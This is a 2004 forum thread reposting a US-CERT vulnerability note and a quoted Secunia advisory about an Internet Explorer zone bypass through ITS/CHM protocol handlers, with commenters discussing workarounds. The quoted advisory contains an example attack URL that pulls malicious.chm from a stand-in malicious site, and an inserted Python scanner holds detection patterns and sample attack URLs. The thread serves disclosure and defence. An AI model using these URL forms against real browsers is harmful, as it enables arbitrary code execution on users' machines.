US-CERT Vulnerability Note VU#323070 (Internet Explorer Security Hole)
CERT ^ | 04/05/2004 | Art Manion

Posted on 04/08/2004 12:56:30 PM PDT by Salo

Vulnerability Note VU#323070

Microsoft Internet Explorer does not properly validate source of CHM components referenced by ITS protocol handlers

Overview

Microsoft Internet Explorer (IE) does not adequately validate the source of script contained in compiled help (CHM) file components that are referenced by the Microsoft InfoTech Storage (ITS) protocol handlers. An attacker could exploit this vulnerability to execute script in different security domains. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user running IE.

I. Description

The Cross Domain Security Model

IE uses a cross-domain security model to maintain separation between browser frames from different sources. This model is designed to prevent code in one domain from accessing data in a different domain. The Local Machine Zone is "...an implicit zone for content that exists on the local computer. The content found on the user's computer, except for content that Internet Explorer caches on the local system, is treated with a high level of trust."

HTML Help

The Microsoft HTML Help system "...is the standard help system for the Windows platform." HTML Help components can be compiled to "...compress HTML, graphic, and other files into a relatively small compiled help (.chm) file...". The resulting compiled Help (CHM) file can then "...be distributed with a software application, or downloaded from the Web." The Help Viewer application "...uses the underlying components of Microsoft Internet Explorer to display help content. It supports HTML, ActiveX, Java, scripting languages (JScript, and Microsoft Visual Basic Scripting Edition)...".

The InfoTech Storage Format

CHM files use the Microsoft InfoTech Storage format (ITS). IE can access components within CHM files (via the IStorage interface) using several protocol handlers: ms-its, ms-itss, its, mk:@MSITStore.

For example, the following URL references an HTML file within a CHM file hosted on a remote web site:

ms-its:http://www.example.com/directory/path/compiledhelpfile.chm:/htmlfile.html

This URL references a local CHM file:

ms-its:file://c:\directory\path\compiledhelpfile.chm:/htmlfile.html

MIME Encapsulation of Aggregate HTML Documents (MHTML)

MHTML (RFC 2110) provides a way to include multiple components of an HTML document (HTML, images, script, etc.) in a single MIME email message. The ITS protocol handlers can also reference objects contained within MHTML documents:

ms-its:mhtml:file://c:\directory\path\mhtmlfile.mhtml

The ITS protocol handlers can specify an alternate location for MHTML content:

ms-its:mhtml:file://c:\file_does_not_exist.mhtml!http://www.example.com/directory/path/compiledhelpfile.chm:/htmlfile.html

The Problem

If an ITS protocol handler is unable to access the specified MHTML file, the handler will attempt to access the content specified by the alternate location. The ITS protocol handlers incorrectly treat HTML content from one domain (htmlfile.html in example.com) as if it were in a different domain (file://, the Local Machine Zone). This is a violation of the cross-domain security model. Limited testing shows that the ms-its, its, and mk:@MSITStore protocol handlers are vulnerable.

An attacker could exploit this vulnerability using a crafted HTML document containing script or an ActiveX object or possibly an IFRAME element. Due to the way IE determines the MIME type of a file referenced by a URL, an HTML document may not necessarily have the expected file name extension (.html or .htm). Likewise, a CHM file may not have the expected .chm extension.

Functional exploit code is publicly available, and there are reports of systems being compromised via this vulnerability (Ibiza trojan).

Any program that uses the WebBrowser ActiveX control or the IE HTML rendering engine (MSHTML) may be affected by this vulnerability. Outlook and Outlook Express are affected.

II. Impact

By convincing a victim to view an HTML document (web page, HTML email), an attacker could execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user running IE. The attacker could also read or modify data in other web sites (read cookies/content, modify/create content, etc.).

III. Solution

There is no complete solution for this vulnerability. Until a patch is available, consider the workarounds listed below.

Note: Disabling Active scripting or ActiveX controls is not an effective workaround

Disabling Active scripting and ActiveX controls in any zone does not prevent the exploitation of this vulnerability. Disabling these features in the Internet and Local Machine Zones may stop some attacks.

Disable ITS protocol handlers

Disabling ITS protocol handlers may prevent exploitation of this vulnerability. Rename the following registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its, its, mk}

Modifying the Windows registry in this way may have unintended consequences. On Windows XP and ME, disabling the ITS protocol handlers will reduce the functionality of the Help and Support Center (HSC).

Do not follow unsolicited links

Do not click on unsolicited URLs received in email, instant messages, web forums, or internet relay chat (IRC) channels.

Maintain updated anti-virus software

Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. US-CERT maintains a partial list of antivirus vendors.

Use a different web browser

There are a number of significant vulnerabilities in technologies relating to the IE domain/zone security model, the DHTML object model, MIME type determination, and ActiveX. It is possible to reduce exposure to these vulnerabilities by using a different web browser. Such a decision may, however, reduce the functionality of sites that require IE-specific features such as DHTML, VBScript, and ActiveX. Note that using a different web browser will not remove IE from a Windows system, and other programs may invoke IE, the WebBrowser ActiveX control, or the HTML rendering engine (MSHTML). It is possible for a different browser on a Windows system to invoke IE to handle ITS protocol URLs.

Systems Affected

Vendor                 Status      Date Updated
Microsoft Corporation  Vulnerable  5-Apr-2004

References


TOPICS: Business/Economy; Technical
KEYWORDS: computersecurity; explorer; internet; microsoft; security
Beware.
1 posted on 04/08/2004 12:56:31 PM PDT by Salo

To: rdb3; Bush2000; ShadowAce; Ernest_at_the_Beach; TechJunkYard; Swordmaker
Pinging the Penguin Pinger and other interested parties.
2 posted on 04/08/2004 12:58:10 PM PDT by Salo (Revenge is for those too weak to hold a grudge.)

To: All

Donate Here By Secure Server

3 posted on 04/08/2004 12:59:01 PM PDT by Support Free Republic (If Woody had gone straight to the police, this would never have happened!)

To: Salo
Can you or someone please translate this for me?

Carolyn

4 posted on 04/08/2004 12:59:17 PM PDT by CDHart

To: Salo
Thank you.
5 posted on 04/08/2004 1:02:14 PM PDT by lilylangtree (Veni, Vidi, Vici)

To: Salo
One of many. Not sure if it's going to be fixed by the patches out next Tuesday or not. Microsoft won't say. Another fun one is embedding < iframe src="?" > in html (minus the spaces on the ends).
6 posted on 04/08/2004 1:02:47 PM PDT by sigSEGV

To: CDHart
Translation: IE is very broke and Microsoft doesn't have any fixes yet. Your PC could be hijacked or erased by any web page that puts exploit code in it. Use another browser like Mozilla, Firefox, or Opera.
7 posted on 04/08/2004 1:04:24 PM PDT by sigSEGV

To: sigSEGV
Ah, but you don't have that choice when clicking on a .chm file on a local hard drive.
8 posted on 04/08/2004 1:12:50 PM PDT by TechJunkYard

To: TechJunkYard
This is the secunia advisory for the same problem:

Secunia Advisory: SA10523
Release Date: 2004-01-02
Last Update: 2004-04-07

http://secunia.com/advisories/10523/

Critical:
Highly critical
Impact: Security Bypass

Where: From remote

Software: Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6

Description:
Variants of the older showHelp() zone bypass vulnerability have been discovered, which potentially can be exploited to compromise a user's system.

Remote and locally installed "CHM" help files can be opened by websites via either the "showHelp()" function or certain URI handlers like "ms-its:" and "mk:@MSITStore:". Remote files can execute code in context of the "Internet" security zone whereas local files may execute code with the privileges of the logged in user.

Normally, it isn't a problem that Internet Explorer allows websites to open locally installed "CHM" files as they are considered trusted.

However, there exist two problems within the handling of "CHM" files:

1) It is possible to treat other local files as "CHM" files by using a special syntax with a double ":" appended to the file name combined with a directory traversal using the "..//" character sequence.

This has been exploited via programs such as WinAmp, Flash Player, XMLHTTP, ADODB stream and others, which allow files with arbitrary content to be placed in known locations.

2) Files, which haven't been installed locally, may still execute arbitrary code in context of the "Local Zone" by referencing a non-existent file.

Example:
ms-its:mhtml:file://C:\does_not_exist.mhtml!http://[malicious_site]//malicious.chm::/evil.html"

The vulnerability can be exploited in Internet Explorer including the latest versions with all patches and service packs installed.

Solution:
Remove the file association for CHM files. However, this will effectively disable Windows Help.

Use another product.

Provided and/or discovered by:
Originally reported by Arman Nayyeri.

Changelog:
2004-03-29: Added more information about variants. Updated "Solution" section and increased criticality.
2004-04-07: Added link to US-CERT vulnerability note.

Other References:
The old Internet Explorer showHelp() function vulnerability (SA8004):
http://secunia.com/advisories/8004/

US-CERT VU#323070:
http://www.kb.cert.org/vuls/id/323070

9 posted on 04/08/2004 1:48:21 PM PDT by Salo (Revenge is for those too weak to hold a grudge.)
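The two URL forms described on this page, the mhtml alternate-location fallback in the US-CERT note and the double-colon "CHM" syntax in the Secunia text quoted above, can be recognised mechanically in proxy logs or HTML email source. The following Python is an added example, not code from US-CERT, Secunia or the original poster: it parses ITS-handler URLs (ms-its, ms-itss, its, mk:@MSITStore) found in constructed sample lines, separates the primary location, the "!" alternate and the container/component, and flags references whose alternate location sits in a different zone from the primary. The function names, the coarse zone classification and the sample lines are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Protocol handlers named in the advisory. The lookbehind stops "its:" from
# matching inside words such as "bits:" or "MSITStore".
ITS_URL_RE = re.compile(r'(?<![\w-])(?:ms-itss?|its|mk:@msitstore):[^\s"\'<>]+', re.IGNORECASE)
SCHEME_RE = re.compile(r'^(ms-itss?|its|mk:@msitstore):', re.IGNORECASE)
# Container and component are separated by ":/" (or the "::/" variant); the
# negative lookahead keeps "http://" and "file://" from being taken for it.
COMPONENT_RE = re.compile(r'^(?P<container>.*?):{1,2}/(?!/)(?P<component>.*)$')


@dataclass
class ItsReference:
    raw: str
    handler: str
    uses_mhtml: bool
    primary: str              # location the handler tries first
    alternate: Optional[str]  # "!" alternate location, used if the primary fails
    container: str            # CHM/MHTML container actually holding the component
    component: Optional[str]  # path inside the container, if any


def zone_of(location: str) -> str:
    """Coarse zone guess from the scheme (assumption for this example):
    local for file:// or a drive letter, internet for http/https/ftp."""
    loc = location.strip().lower()
    if loc.startswith("file:") or re.match(r'^[a-z]:[\\/]', loc):
        return "local"
    if loc.startswith(("http:", "https:", "ftp:")):
        return "internet"
    return "unknown"


def parse_its_reference(url: str) -> Optional[ItsReference]:
    """Split an ITS-handler URL into handler, mhtml flag, primary/alternate
    locations and container/component. Returns None for non-ITS URLs."""
    url = url.strip()
    m = SCHEME_RE.match(url)
    if not m:
        return None
    handler = m.group(1).lower()
    rest = url[m.end():]
    uses_mhtml = rest.lower().startswith("mhtml:")
    if uses_mhtml:
        rest = rest[len("mhtml:"):]
    primary, _, alternate = rest.partition("!")
    target = alternate if alternate else primary
    cm = COMPONENT_RE.match(target)
    container, component = (cm.group("container"), cm.group("component")) if cm else (target, None)
    return ItsReference(url, handler, uses_mhtml, primary, alternate or None, container, component)


def assess(ref: ItsReference) -> List[str]:
    """Defender-side findings for one reference; an empty list means nothing suspicious."""
    findings = []
    # VU#323070 pattern: a local (file://) primary that will fail, with the real
    # content supplied from another zone through the alternate location.
    if ref.uses_mhtml and ref.alternate and zone_of(ref.primary) == "local" \
            and zone_of(ref.alternate) != "local":
        findings.append(f"cross-zone mhtml fallback: local primary, {zone_of(ref.alternate)} alternate")
    # SA10523 variant: double-colon component separator or ..// traversal.
    if "::/" in ref.raw or "..//" in ref.raw:
        findings.append("double-colon or ..// syntax in ITS reference")
    if zone_of(ref.container) == "internet" and ref.component:
        findings.append("component loaded from a remote container through an ITS handler")
    return findings


def scan_lines(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Return (line number, url, findings) for every ITS URL with findings."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in ITS_URL_RE.finditer(line):
            ref = parse_its_reference(m.group(0))
            if ref is not None:
                findings = assess(ref)
                if findings:
                    hits.append((n, ref.raw, findings))
    return hits


# Constructed sample lines: a plain URL, a benign local help reference, and the
# two forms from the advisories (example.com hostnames as on the page).
SAMPLE_LINES = [
    r'GET http://www.example.com/index.html',
    r'href="ms-its:file://c:\directory\path\compiledhelpfile.chm:/htmlfile.html"',
    r'ms-its:mhtml:file://c:\file_does_not_exist.mhtml!http://www.example.com/directory/path/compiledhelpfile.chm:/htmlfile.html',
    r'mk:@MSITStore:http://www.example.com/directory/path/compiledhelpfile.chm::/htmlfile.html',
]

if __name__ == "__main__":
    for line_no, url, findings in scan_lines(SAMPLE_LINES):
        print(f"line {line_no}: {url}")
        for f in findings:
            print(f"    - {f}")
```

The zone classification is deliberately coarse: it only distinguishes file-scheme and drive-letter locations from http/https/ftp, which is enough to catch the fallback shape the note describes, where the handler silently loads internet content as if it were local.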

To: John Robinson; B Knotts; stainlessbanner; TechJunkYard; ShadowAce; Knitebane; AppyPappy; jae471; ...
The Penguin Ping.

Wanna be Penguified? Just holla!

Got root?


10 posted on 04/08/2004 2:05:22 PM PDT by rdb3 (The cornrows are gone, so now they call me "Slim Fadey"... † <><)

To: Salo
This bears repeating:

Use a different web browser

There are a number of significant vulnerabilities in technologies relating to the IE domain/zone security model, the DHTML object model, MIME type determination, and ActiveX. It is possible to reduce exposure to these vulnerabilities by using a different web browser. Such a decision may, however, reduce the functionality of sites that require IE-specific features such as DHTML, VBScript, and ActiveX. Note that using a different web browser will not remove IE from a Windows system, and other programs may invoke IE, the WebBrowser ActiveX control, or the HTML rendering engine (MSHTML). It is possible for a different browser on a Windows system to invoke IE to handle ITS protocol URLs.

11 posted on 04/08/2004 3:22:21 PM PDT by zeugma (The Great Experiment is over.)

To: zeugma
This bears repeating:

Use a different web browser

In its defense, MSIE does seem easier for the Pre-K and Kindergarten set to use than some of the other browsers are.

12 posted on 04/08/2004 5:09:04 PM PDT by PAR35

To: zeugma
This bears repeating:

Use a different web browser

Don't you mean use a different OS??

Linux, OS X, Beos, DOS, Commodore 64??

13 posted on 04/08/2004 6:26:35 PM PDT by amigatec (There are no significant bugs in our software... Maybe you're not using it properly.- Bill Gates)

To: Support Free Republic
Earlier, when I first opened this thread, my Norton intercepted Bloodhound Exploit.6 and ID'd the sender as ...."Temorary Internet Files\Content\.IE5FAQN5\Posts[3]"

You don't think you're sending this, do you?
14 posted on 04/08/2004 7:17:02 PM PDT by ninenot (Minister of Membership, TomasTorquemadaGentlemen'sClub)

To: sigSEGV
Thank you!

Carolyn

15 posted on 04/09/2004 3:13:17 AM PDT by CDHart

To: amigatec
Don't you mean use a different OS??

Linux, OS X, Beos, DOS, Commodore 64??

Well, yeah. I figure I beat that drum often enough though that I could give it a rest. :-)

16 posted on 04/09/2004 5:59:28 AM PDT by zeugma (The Great Experiment is over.)

To: Salo
Surprise, Surprise, Surprise...


17 posted on 04/09/2004 4:49:05 PM PDT by AFreeBird (your mileage may vary)

To: zeugma
Not ONLY use a different browser, but go into the Internet security settings in Internet Options, and disable or change to "prompt" ALL ActiveX settings.
18 posted on 04/09/2004 4:52:07 PM PDT by AFreeBird (your mileage may vary)

To: rdb3
Now that is an ironic pic!

I am no penguin hater (run Fedora at home alongside my XP box and I use Linux for firewall/router functions for some clients) but the penguin don't play.

A couple mainstream (DX games) like Unreal? America's Army? Is Doom 3 going to have a Linux ver?

I am working toward some business application and simple workstation uses of Linux - but a 'frag' o/s it is not (yet anyway).
19 posted on 04/09/2004 5:04:24 PM PDT by CyberCowboy777 (We should never ever apologize for who we are, what we believe in, and what we stand for.)

To: sigSEGV
I personally cannot stand my browser and email mixed so I run Firefox at home, but still is not in a place for me to install it on my clients systems.

You must remember that many of the exploits of IE are because of the features of IE. Features we use every day that seem simple, but when you are used to them it is hard to do without.

I might be soon though. I am very excited about Thunderbird, just needs an integrated calendar and active sync compatibility. (though my larger clients will still run Exchange/Outlook)

20 posted on 04/09/2004 5:08:53 PM PDT by CyberCowboy777 (We should never ever apologize for who we are, what we believe in, and what we stand for.)